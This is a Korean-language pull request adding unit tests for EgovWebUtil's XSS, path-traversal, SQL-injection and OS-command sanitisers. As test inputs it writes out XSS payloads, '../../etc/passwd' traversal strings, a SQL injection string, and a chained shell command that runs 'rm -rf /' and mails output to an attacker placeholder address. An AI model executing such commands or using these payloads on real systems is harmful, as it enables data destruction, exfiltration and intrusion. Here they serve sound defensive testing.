### PR TITLE
[test] EgovWebUtil XSS/경로탐색 방어 로직 단위 테스트 추가

### DIFF
--- a/device-api-web/src/test/java/egovframework/hyb/utils/EgovWebUtilTest.java
+++ b/device-api-web/src/test/java/egovframework/hyb/utils/EgovWebUtilTest.java
@@ -1,0 +1,97 @@
+package egovframework.hyb.utils;
+
+import static org.assertj.core.api.Assertions.assertThat;
+import static org.assertj.core.api.Assertions.assertThatThrownBy;
+
+import org.junit.jupiter.api.Test;
+
+class EgovWebUtilTest {
+
+    @Test
+    void clearXSSMinimum_null이나_공백이면_빈문자열을_반환한다() {
+        assertThat(EgovWebUtil.clearXSSMinimum(null)).isEqualTo("");
+        assertThat(EgovWebUtil.clearXSSMinimum("   ")).isEqualTo("");
+    }
+
+    @Test
+    void clearXSSMinimum_스크립트_태그와_특수문자를_이스케이프한다() {
+        String result = EgovWebUtil.clearXSSMinimum("<script>alert('xss')</script>");
+        assertThat(result).isEqualTo("&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;");
+    }
+
+    @Test
+    void clearXSSMaximum_이스케이프된_값에_대해_추가_치환을_적용한다() {
+        String result = EgovWebUtil.clearXSSMaximum("<img src=x onerror=alert(1)>");
+        assertThat(result).isEqualTo("&lt;img src=x onerror=alert(1)&gt;");
+    }
+
+    @Test
+    void clearXSS_퍼센트_인코딩된_꺾쇠도_이스케이프한다() {
+        assertThat(EgovWebUtil.clearXSS("%3Cscript%3E")).isEqualTo("&lt;script&gt;");
+        assertThat(EgovWebUtil.clearXSS("<script>")).isEqualTo("&lt;script&gt;");
+    }
+
+    @Test
+    void filePathBlackList_단일인자는_점점을_모두_제거한다() {
+        assertThat(EgovWebUtil.filePathBlackList(null)).isEqualTo("");
+        assertThat(EgovWebUtil.filePathBlackList("../../etc/passwd")).isEqualTo("//etc/passwd");
+    }
+
+    @Test
+    void filePathBlackList_basePath가_없으면_예외를_던진다() {
+        assertThatThrownBy(() -> EgovWebUtil.filePathBlackList("x", null))
+                .isInstanceOf(SecurityException.class)
+                .hasMessage("base path is empty.");
+        assertThatThrownBy(() -> EgovWebUtil.filePathBlackList("x", ""))
+                .isInstanceOf(SecurityException.class)
+                .hasMessage("base path is empty.");
+    }
+
+    @Test
+    void filePathBlackList_basePath가_루트이면_예외를_던진다() {
+        assertThatThrownBy(() -> EgovWebUtil.filePathBlackList("x", "/"))
+                .isInstanceOf(SecurityException.class)
+                .hasMessage("base path does not allow Root.");
+    }
+
+    @Test
+    void filePathBlackList_basePath와_결합한_뒤_경로탐색문자를_제거한다() {
+        String result = EgovWebUtil.filePathBlackList("../secret.txt", "/data/uploads");
+        assertThat(result).isEqualTo("/data/uploads/secret.txt");
+    }
+
+    @Test
+    void filePathReplaceAll_슬래시_역슬래시_점점_앰퍼샌드를_제거한다() {
+        assertThat(EgovWebUtil.filePathReplaceAll(null)).isEqualTo("");
+        assertThat(EgovWebUtil.filePathReplaceAll("../../etc/passwd")).isEqualTo("etcpasswd");
+    }
+
+    @Test
+    void fileInjectPathReplaceAll_슬래시와_점으로_시작하는_두글자를_제거한다() {
+        assertThat(EgovWebUtil.fileInjectPathReplaceAll(null)).isEqualTo("");
+        assertThat(EgovWebUtil.fileInjectPathReplaceAll("../../etc/passwd.txt")).isEqualTo("etcpasswdxt");
+    }
+
+    @Test
+    void isIPAddress_점으로_구분된_숫자_네덩이_형식만_인식한다() {
+        assertThat(EgovWebUtil.isIPAddress("192.168.0.1")).isTrue();
+        assertThat(EgovWebUtil.isIPAddress("not-an-ip")).isFalse();
+        assertThat(EgovWebUtil.isIPAddress("192.168.0.1abc")).isFalse();
+    }
+
+    @Test
+    void removeCRLF_개행문자를_제거한다() {
+        assertThat(EgovWebUtil.removeCRLF("line1\r\nline2")).isEqualTo("line1line2");
+    }
+
+    @Test
+    void removeSQLInjectionRisk_공백과_SQL_특수문자를_제거한다() {
+        assertThat(EgovWebUtil.removeSQLInjectionRisk("1' OR '1'='1' --")).isEqualTo("1'OR'1'='1'");
+    }
+
+    @Test
+    void removeOSCmdRisk_공백과_쉘_특수문자를_제거한다() {
+        String result = EgovWebUtil.removeOSCmdRisk("ls -la; rm -rf / | mail attacker@example.com");
+        assertThat(result).isEqualTo("ls-larm-rf/mailattacker@example.com");
+    }
+}


### PR DESCRIPTION
## 변경 사유

DI 의존성 없는 순수 유틸인 `EgovWebUtil`의 XSS 이스케이프, 경로 탐색(`../`) 차단, SQL/OS 인젝션 방어 로직에 대한 테스트가 없어 회귀 방지를 위해 추가했습니다.

## 변경 내용

`EgovWebUtilTest` 신설, JUnit5 + AssertJ 기반 단위 테스트 14건.

## 테스트 방법 / 영향 범위

`mvn test`로 신규 테스트 14건 전부 통과 확인했습니다. 프로덕션 코드 변경은 없습니다.

- [x] 단일 주제만 다룸 (다른 변경 없음)
- [x] 기존 동작에 영향 없음 (테스트 코드만 추가)
- [x] 테스트 통과 확인